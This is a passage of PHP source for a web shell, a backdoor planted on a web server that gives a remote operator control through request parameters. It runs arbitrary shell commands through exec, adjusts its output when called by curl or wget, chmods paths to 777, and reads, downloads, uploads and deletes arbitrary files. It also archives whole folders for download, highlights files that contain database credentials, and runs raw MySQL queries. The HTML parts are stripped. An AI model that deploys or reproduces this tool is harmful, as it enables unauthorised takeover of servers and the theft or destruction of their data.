$val) // Process '..' & '.' directories
{
if($val=="..")
{
$parts[$key]="";
$lastKey=$key-1;
$parts[$lastKey]="";
}
elseif($val==".")
{
$parts[$key]="";
}
}
reset($parts);
$fixedPath=($isLinux ? "/" : ""); // Some PHP configs wont automatically create a variable on .= or will at least whine about it
$firstPiece=true;
foreach($parts as $val) // Assemble the path back together
{
if($val != "")
{
$fixedPath .= ($firstPiece ? '' : $slash) . $val;
$firstPiece=false;
}
}
if($fixedPath=="") // If we took out the entire path go to bottom level to avoid an error
{
$fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash));
}
// Make sure there is an ending slash
if(substr($fixedPath,-1)!=$slash)
$fixedPath .= $slash;
return $fixedPath;
}
if(isset($_REQUEST['chm']))
{
if(!$isLinux)
{
echo "This feature only works on Linux";
}
else
{
echo (@chmod ($_REQUEST['chm'],0777) ? "Reassigned" : "Can't Reasign");
}
}
elseif(isset($_REQUEST['phpinfo']))
{
phpinfo();
}
elseif(isset($_REQUEST['dl']))
{
if(@fopen($_REQUEST['dl'] . $_REQUEST['file'],'r')==true)
{
$_REQUEST['dl'] .= $_REQUEST['file'];
if(substr($_REQUEST['dl'],0,1)==$slash)
$fileArr=explode($slash,$_REQUEST['dl']);
header('Content-disposition: attachment; filename=' . $_REQUEST['file']);
header('Content-type: application/octet-stream');
readfile($_REQUEST['dl']);
}
else
{
echo $_REQUEST['dl'];
}
}
elseif(isset($_REQUEST["gz"]))
{
if(!$isLinux)
{
echo "This feature only works on Linux";
}
else
{
$directory=$_REQUEST["gz"];
if(substr($directory,-1)=="/")
$directory=substr($directory,0,-1);
$dirParts=explode($slash,$directory);
$fname=$dirParts[(sizeof($dirParts)-1)];
$archive=time();
exec("cd $directory; tar czf $archive *");
$output=@file_get_contents($directory . "/" . $archive);
if(!$output)
header("Content-disposition: attachment; filename=ACCESS_PROBLEM");
else
{
header("Content-disposition: attachment; filename=$fname.tgz");
echo $output;
}
header('Content-type: application/octet-stream');
@unlink($directory . "/" . $archive);
}
}
elseif(isset($_REQUEST['f']))
{
$filename=$_REQUEST['f'];
$file=fopen("$filename","rb");
header("Content-Type: text/plain");
fpassthru($file);
}
elseif(isset($_REQUEST['d']))
{
$d=$_REQUEST['d'];
echo "";
if ($handle=opendir("$d"))
{
echo "Listing of ";
$conString="";
if($isLinux)
echo "$slash";
foreach(explode($slash,cleanPath($d,$isLinux)) as $val)
{
$conString .= $val . $slash;
echo "" . $val . "" . ($val != "" ? $slash : '');
}
echo " (upload file) (DB interaction files in red)
(gzip & download folder) (chmod folder to 777) (these rarely work)
";
while ($dir=readdir($handle))
{
if (is_dir("$d$slash$dir"))
{
if($dir != "." && $dir !="..")
$dirList[]=$dir;
}
else
{
if(isset($_REQUEST["hldb"]))
{
$contents=file_get_contents("$d$slash$dir");
if (stripos($contents,"mysql_") || stripos($contents,"mysqli_") || stripos($contents,"SELECT "))
{
$fileList[]=array('dir'=>$dir,'color'=>'red');
}
else
{
$fileList[]=array('dir'=>$dir,'color'=>'black');
}
}
else
{
$fileList[]=array('dir'=>$dir,'color'=>'black');
}
}
}
echo ".\n";
echo "..\n";
// Some configurations throw a notice if is_array is tried with a non-existent variable
if(isset($dirList))
if(is_array($dirList))
foreach($dirList as $dir)
{
echo "$dir\n";
}
if(isset($fileList))
if(is_array($fileList))
foreach($fileList as $dir)
{
echo "" . $dir['dir'] . "" .
"|Download|" .
"|Edit|" .
"|Delete| \n";
}
}
else
echo "opendir() failed";
closedir($handle);
echo "";
}
elseif(isset($_REQUEST['c']))
{
if(@ini_get('safe_mode'))
{
echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programs in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ')
';
}
$USER_AGENT=strtolower(substr($_SERVER['HTTP_USER_AGENT'],0,4));
$SILENT_MODE=TRUE;
if ($USER_AGENT != "curl" && $USER_AGENT != "wget")
{
$SILENT_MODE=FALSE;
echo "Command: " . $_REQUEST['c'] . "
";
}
trim(exec($_REQUEST['c'],$return));
foreach($return as $val)
{
if ($SILENT_MODE)
{
echo htmlentities($val);
}
else
{
echo '' . htmlentities($val) . '
';
}
}
}
elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"]))
{
if(isset($_FILES["file_name"]))
{
if ($_FILES["file_name"]["error"] > 0)
{
echo "Error";
}
else
{
$target_path=$_COOKIE["uploadDir"];
if(substr($target_path,-1) != "/")
$target_path .= "/";
$target_path=$target_path . basename($_FILES['file_name']['name']);
if(move_uploaded_file($_FILES['file_name']['tmp_name'],$target_path)) {
setcookie("uploadDir","");
echo "The file ". basename($_FILES['file_name']['name']).
" has been uploaded";
}
else
{
echo "Error copying file, likely a permission error.";
}
}
}
else
{
?>
The following query has sucessfully executed" . htmlentities($mquery) . "
";
echo "Return Results:
";
$first=true;
echo "";
while ($row=mysql_fetch_array($result,MYSQL_ASSOC))
{
if($first)
{
echo "";
foreach($row as $key=>$val)
{
echo "| $key | ";
}
echo "
";
reset($row);
$first=false;
}
echo "";
foreach($row as $val)
{
echo "| $val | ";
}
echo "
";
}
echo "
";
mysql_free_result($result);
}
else
{
echo "Query Error: " . mysql_error();
}
}
elseif(isset($_REQUEST['df']))
{
$_REQUEST['df'] .= $slash . $_REQUEST['file'];
if(@unlink($_REQUEST['df']))
{
echo "File deleted";
}
else
{
echo "Error deleting file";
}
}
elseif(isset($_REQUEST['ef']))
{
?>
Server Information:
Operating System:
PHP Version: View phpinfo()
Directory Traversal
Go to current working directory
Go to root directory
Go to any directory:
Execute MySQL Query: